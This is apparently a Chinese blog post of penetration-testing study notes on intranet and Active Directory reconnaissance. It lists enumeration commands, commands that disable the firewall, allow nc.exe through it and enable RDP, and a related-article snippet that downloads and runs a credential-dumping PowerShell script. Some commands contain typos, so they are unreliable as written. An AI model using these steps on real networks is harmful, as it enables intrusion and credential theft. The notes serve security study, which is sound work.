内网信息收集学习笔记

最新推荐文章于 2023-08-21 18:53:06 发布
最新推荐文章于 2023-08-21 18:53:06 发布
阅读量276 收藏 2
点赞数 3
分类专栏: 内网渗透 笔记 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45644323/article/details/120667634
版权

信息收集概述:

首先对当前网络环境进行判断:

1.对当前机器角色进行判断;

2.对当前机器所处网络环境的拓扑结构进行分析和判断;

3.对机器所处环境进行判断;

收集本机信息

查询网络配置信息:ipconfig -all

查询操作系统及软件信息:

操作系统及版本信息:

systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

在这里插入图片描述

查看系统体系结构 :

echo %processor_architecture%

在这里插入图片描述

查看安装的软件,版本和路径:

wmic product get name,version

在这里插入图片描述

查询本机服务:

wmic service list brief

在这里插入图片描述

查看进程:

tasklist:

wmic service list brief

查看启动程序信息::

wmic startup get command,caption

查看计划任务:

schtasks  /query /fo list /v

获取本地管理员信息:

net localgroup administrators

查看当在线用户:

query user || qwinsta

查询端口列表:

netstat -an

查看系统详细信息:

systeminfo 注意系统的版本 ,位数,域,补丁信息,更新频率等;

查看系统补丁:

wmic qfe get caption,description,hotfixid,installedon

查看本机共享列表:

net share
wmic share get name,path,status

查看路由表和可用接口ARP缓存:

route print
arp -a

防火墙相关配置:

查看防火墙配置:netsh firewall show config
关闭防护墙:

win2003以前: netsh firewall set opmode disable
win2003以后: netsh advfirewall set allprofiles state off

修改防火墙配置允许制定程序连接:

win2003以前:netsh firewall add allowedprogram c: \nc.exe “allow ncenable
win2003以后:netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C: \nc.exe"

允许指定程序退出:netsh advfirewall firewall add rule name ="allow nc" dir=out action=allow program="C:\nc.exe"

允许3389端口放行:netsh advfirewall firewall add rule name="Remote Desktop"  protocol=TCP dir=in localport=3389 action=allow
开启3389:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭3389:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

自定义防火墙存储:

netsh advfirewall set currentprofile logging filename
“C:\windows\temp\fw.log”

查看1080端口的代理配置信息:reg query "HEHY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings"

查看当前用户权限:whoami
查看域SID: whoami /all
查看指定用户信息: net user xxx/domain;
判断是否存在域(看是否存在一个网段):ipconfig /all
查看系统详细信息:systeminfo
查看当前域与登录用户信息:net config workstation
判断主域:(域服务器通常会作为时间服务器使用):net time /domain
探测域内存活主机:  (nbtscan)

利用 ICMP协议探测 : for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I |findstr "TTL="
empire中的ARP模块:使用usemodule situational_awareness/network/arpscan

Nishang 的Invoke-ARPScan.ps1脚本: powershell.exe -exec bypass -command “& {import-module C:\windows\temp\Invoke-arpscan.ps1; invoke-arpscan -cidr 192.168.1.0/20}” >> C:\windows\temp\log.txt

利用Scanline 扫描TCP/UDP端口扫描内网: scanline -h -t 22,80-89,110,445 -u 53,161,137 -O C:\windows\temp\log.txt -p 192.168.102.1-254 /b

扫描域内端口需要关注以下几点:

端口的Banner服务;端口上运行的服务;常见应用的默认端口;

利用telnet进行扫描:Telnet 192.168.102.8 2

在这里插入图片描述
metasploit端口扫描器:使用auxiliary/scanner/portscan/tcp模块

use auxiliary/scanner/portscan/tcp
set  ports 1-1024   
set rhosts 192.168.102.8
set threads 10
run

在这里插入图片描述
收集域内基本信息 :

查询域: net view /doamin

如果存在域,查看域内所有计算机: net view /domain:hacke

查询域内所有用户列表:net group /domain

系统自带用户身份列表:

domain admins:域管理员
domain computers:域内机器
domain controllers:域控制器
domain guest:域访客
domain user:域用户
enterprise admins:企业系统管理员用户

普通情况下,domain admins和enterprise admins对域内所有的域控制器 有完全控制权限

查询域成员所有计算机列表:

net group “domain computers”/domain

获取域密码信息:

net accounts /domain

获取域信任信息:

nltest /domain_trusts

查找域控制器:

查看预控机器名:nltest /DCLIST:name /netdom query pdc

查看预控主机名:nslookup -type=SRV _ldap.tcp

查看当前时间:net time /domain

查看预控组:net group “domain  controllers” /domain

预控一般有两台:有一台备用;

获取域内用户和管理员信息:

查询所有域用户列表:net user /domain 

获取域内用户的详细信息:wmic useraccount get /all

查询在线用户:dsquery user

查询本地本地管理员组用户:net localgroup admintrators

查询域管理员用户:net group "domain admins" /domain

查询管理员用户组:net group "enterprise admins" /domain

域管理员定位工具:

在windows上 可以用net sessionchakan 谁用了本机资源,但是查不出来谁在使用远程计算机资源,或者谁登录了远程计算机;

1.psloggedon.exe: psloggedon \domainname同样需要管理员权限;
在这里插入图片描述
原理是:通过注册表的HKEY_USER的key值来查询;

2.PVEFindADUser.exe查找活动目录用户的登录的位置,枚举域用户,查找特定计算计算机上登录的用户;

条件:管理员权限;NET Framework2.0环境;

PVEFindADUser.exe -current:显示所有域内计算机
在这里插入图片描述
3.netview.exe枚举用户,能够寻找登录会话,寻找共享,枚举登录的用户,大部分都不用管理员权限;
在这里插入图片描述

4.Nmap的NSE脚本

smb-enum-domains.nse 对域控进行信息收集,获取主机信息,用户,使用密码策略的用户 ;

smb-enum-users.nse 拿到了域内某台主机的权限,但是权限有限,可以用这个脚本对预控进行扫描;

smb-enum-shares.nse便利远程主机的共享目录;

smb-enum-processes.nse对进程进行遍历;

smb-enum-session.nse获取域内主机的登录会话,查看是否有用户登录;

smb-enum-discovery.nse收集 目标主机的OS information,计算机名,域名,域林名称,NetBIOS机器名,工作组,系统时间;

5.PowerView脚本

powershell.exe -exec bypass -command “& {import-module C:\powerview.ps1;Invoke-UserHunter}”接受用户名,用户列表,和域组列表 ;

powershell.exe -exec bypass -command “& {import-module C:\powerview.ps1;Invoke-StealthUserHunter}”获取域内所有的用户;

获取域管理员列表 :net group “domain admins” /domain

列出本机所有进程及进程用户:tasklist  /v

在这里插入图片描述

查看域控列表:net group “domain controllers” /domain

所有活动域的会话列表(netsess.exe列表 ):netsess -h

利用powershell收集信息;

要想执行脚本需要修改配置 :

set-executionpolicy  unrestricted

在这里插入图片描述
导入模块:
在这里插入图片描述

powerview:

获取域内大部分信息
在这里插入图片描述

内网安全-信息收集-内网资源探测-扫描内网存活主机
菜鸟-宇的个人博客
10-06 2389
在渗透测试中可以根据目标主机的情况,上传工具进行主机存活探测,也可以借助内网代理或路由转发对目标主机所处的局域网发起探测。测试人员可以根据当前渗透环境,选用ICMP、NetBIOS、UDP、ARP、SNMP、SMB等多种网络协议。按照协议类型,下面介绍使用常见工具来发现内网存活主机的方法。
内网学习笔记】4、域内信息收集
TeamsSix 的 CSDN 空间
02-24 1041
1、判断是否存在域 ipconfig 查看网关 IP 地址、DNS 的 IP 地址、域名、本机是否和 DNS 服务器处于同一网段。 ipconfig /all C:\Users\daniel10> ipconfig /all Windows IP 配置 主 DNS 后缀 . . . . . . . . . . : teamssix.com DNS 后缀搜索列表 . . . . . . . . : teamssix.com 以太网适配器 Ethernet0: IPv4 地址
windows 10 重新安装 默认软件
weixin_33985507的博客
03-08 570
1 管理员权限打开powershell 2 输入 Set-ExecutionPolicy Unrestricted 出现选项,输入Y 3 将下列代码粘贴输入: # Get all the provisioned packages $Packages = (get-item 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Appx\App...
net user命令集合详解!
明枫驿站
09-18 2352
net use \\ip\ipc$ " " /user:" " 建立IPC空链接  net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接  net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:  net use h: \\ip\c$ 登陆后映射对方C:到本地为H:  net use \\ip\ip
内网渗透测试:域用户和机器用户
Innocence_0的博客
08-21 932
这又是一个关于域内基础概念与原理的系列,本系列将包含以下几篇文章:《内网渗透测试:内网环境与活动目录基础概念》《内网渗透测试:活动目录 Active Directory 的查询》《内网渗透测试:域用户组及域内权限划分》《内网渗透测试:OU 组织单位》《内网渗透测试:域用户和机器用户》《内网渗透测试:域内权限访问控制》《内网渗透测试:Windows 令牌窃取》《内网渗透测试:Windows 组策略讲解》《内网渗透测试:Windows 组策略后门》
域渗透基础知识(三)之域用户与机器用户
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-03 3437
大家都知道域用户是什么,就是域环境中的用户。和本地用户的帐户不同,域用户帐户保存在活动目录中。由于所有的用户帐户都集中保存在活动目录中,所以使得集中管理变成可能。我们知道,在工作组环境中,所有计算机是独立的,要让用户能够登录到计算机并使用计算机的资源,必须为每个用户建立本地用户帐户。而在域环境中,一个域用户可以在域中的任何一台计算机上登录,域用户可以不再使用固定的计算机。当计算机出现故障时,域用户可以登录到另一台计算机上继续工作,这样也使帐号的管理变得简单。
内网-内网安全攻防-笔记.pdf
09-18
二、内网信息收集 1. 网络配置信息查询 使用ipconfig/all可以查询到详细的网络配置信息,这包括IP地址、子网掩码、默认网关等。 2. 操作系统及软件信息查询 使用systeminfo可以查询到系统的详细版本信息,包括OS...
内网学习笔记】3、本地工作组信息收集
TeamsSix 的 CSDN 空间
02-11 638
1、手动收集本地工作组信息 查看当前权限 whoami 本机网络配置信息 ipconfig /all 操作系统和版本信息(英文版) systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 操作系统和版本信息(中文版) systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查看系统体系结构 echo %PROCESSOR_ARCHITECTURE% 查看系统所有环境变量 set 查
内网基础知识&信息收集笔记
hauzhao的博客
09-15 789
A-G-DL-P策略 A(account),表示用户账号 G(Global group),表示全局组 U(universal group),表示通用组 DL(Domain local group),表示本地组 P(Permission许可),表示资源权限 A-G-DL-P策略是将用户账号添加到全局组中,将全局组添加到域本地组中,然后成为域本地组分配资源权限。按照AGDLP的原则对用户进行组织和管理起来更容易 在AGDLP形成后给一个用户某一个权限的时候,只要吧这个用户加到某一个本地域组就可以.
内网渗透笔记,课堂资料
最新发布
03-11
这篇“内网渗透笔记,课堂资料”提供了一套系统性的学习资源,帮助读者了解和掌握内网渗透的相关知识。 一、内网渗透基础 内网渗透涉及到多个步骤,首先需要进行信息收集。这包括但不限于DNS查询、SNMP扫描、端口...
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
PVEFindADUser.exe
04-05
PVEFindADUser.exe
内网渗透----域内信息收集
浅笑996的博客
04-14 1438
工具使用 Nslookup nslookup # 进入交互式界面 set type=all # 设置记录类型,可以设置为srv _ldap._tcp.dc._msdcs.school.com # 执行查询 ADFind.exe 列出域控列表 Adfind.exe -sc...
【網址收藏】解决VSCODE“因为在此系统上禁止运行脚本“报错
学亮编程手记
03-18 385
1. 以管理员身份运行vscode; 2. 执行:get-ExecutionPolicy,显示Restricted,表示状态是禁止的; 3. 执行:set-ExecutionPolicy RemoteSigned; 4. 这时再执行get-ExecutionPolicy,就显示RemoteSigned; https://blog.csdn.net/larpland/article/details/101349586 ...
PowerShell~执行策略的介绍
weixin_33688840的博客
06-07 212
首先看一下无法加载ps1脚本的解决方法 事实上也是由于策略导致的  解决方法主是开启对应的策略 set-ExecutionPolicy RemoteSigned 执行策略更改 执行策略可以防止您执行不信任的脚本。更改执行策略可能会使您面临 about_Execution_Policies 帮助主题中所述的安全风险。是否要更改执行策略? [Y] 是(Y) [N] 否(...
PowerShell签名和执行策略
weixin_33752045的博客
01-23 266
转载自: http://www.cnblogs.com/herbert/archive/2010/06/12/1756923.html主题 签名和执行策略简短说明 描述 Windows PowerShell 执行策略,以及如何使用和更改它们。详细说明 PowerShell 执行策略通过确定 PowerShell 加载配置文件和运行脚本的条件,为脚本环境提供...
Domain Info Gather
prettyX的博客
01-06 520
1、判断是否有域 ipconfig /all nslookup domain_name systeminfo net config workstation net time /domain 通过net time /domain这条命令,依据命令回显结果,可以对当前用户做出区分: 1、在域内,是域用户 2、在域内,但不是域用户 3、不在域内 2、域内存活主机探测 利用netb...
POWERSHELL脚本执行权限
热门推荐
tomcat的专栏
04-16 1万+
1.PowerShell脚本四种执行权限 Restricted——默认的设置, 不允许任何script运行 AllSigned——只能运行经过数字证书签名的script RemoteSigned——运行本地的script不需要数字签名,但是运行从网络上下载的script就必须要有数字签名 Unrestricted——允许所有的script运行 2.查看当前的权限 Get-Executi
内网渗透技术:横向移动学习笔记
1. **信息收集**:攻击者会搜集目标网络内的信息,如IP地址、开放端口、服务版本、操作系统类型、网络拓扑等,以便找出潜在的薄弱环节。 2. **权限提升**:一旦有了初步的访问权限,攻击者会寻找方法提升权限,例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

陈年往事心中绕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值